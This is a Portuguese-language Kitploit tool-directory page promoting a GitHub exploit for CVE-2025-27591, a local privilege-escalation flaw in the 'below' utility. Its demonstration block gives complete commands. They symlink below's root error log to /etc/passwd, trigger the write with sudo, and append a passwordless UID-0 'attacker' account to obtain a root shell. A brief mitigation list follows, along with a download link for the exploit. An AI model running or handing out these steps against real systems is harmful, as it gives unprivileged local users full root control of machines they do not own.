Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/krn966/cve-2025-27591
Escalada de PrivilégiosFrameworks de ExploraçãoAnálise de VulnerabilidadesExploração
GitHubkrn966/cve-2025-27591

CVE-2025-27591

Exploit de escalada de privilégios local para CVE-2025-27591, abusando do tratamento inseguro de symlinks no registro do utilitário abaixo para sobrescrever arquivos arbitrários como root.

Ver Repositório
há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-27591 - Escalação de Privilégios via Tratamento Inseguro de Logs

Visão Geral

A CVE-2025-27591 é uma vulnerabilidade local de escalação de privilégios no utilitário below (versões anteriores à versão corrigida) causada pelo tratamento inseguro de links simbólicos dentro do seu mecanismo de registro de logs. Atacantes com acesso local podem explorar essa falha para sobrescrever arquivos arbitrários como usuário root, levando à escalação total de privilégios.

Detalhes da Vulnerabilidade

A ferramenta below grava logs em /var/log/below/ sem validar adequadamente links simbólicos. Ao pré-criar um link simbólico apontando para um arquivo sensível (por exemplo, /etc/passwd), um atacante pode injetar conteúdo arbitrário com privilégios elevados quando o processo vulnerável é executado sob sudo.

Demonstração do Exploit

root@kitploit:~
# Verifica se o diretório de logs existe
test -d /var/log/below && ls -ld /var/log/below

# Remove o arquivo de log existente e cria um link simbólico malicioso
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log

# Prepara entrada maliciosa no passwd
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker

# Aciona o comportamento vulnerável usando sudo
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log

# Alterna para o usuário recém-criado com privilégios de root
su attacker

Impacto

A exploração bem-sucedida concede privilégios de root a um atacante local sem privilégios, permitindo o comprometimento total do sistema.

Mitigação

  • Aplique o patch do fornecedor imediatamente quando disponível.
  • Restrinja o acesso ao diretório /var/log/below/.
  • Valide os caminhos dos arquivos de log antes de gravar para evitar seguir links simbólicos.
Baixar ferramenta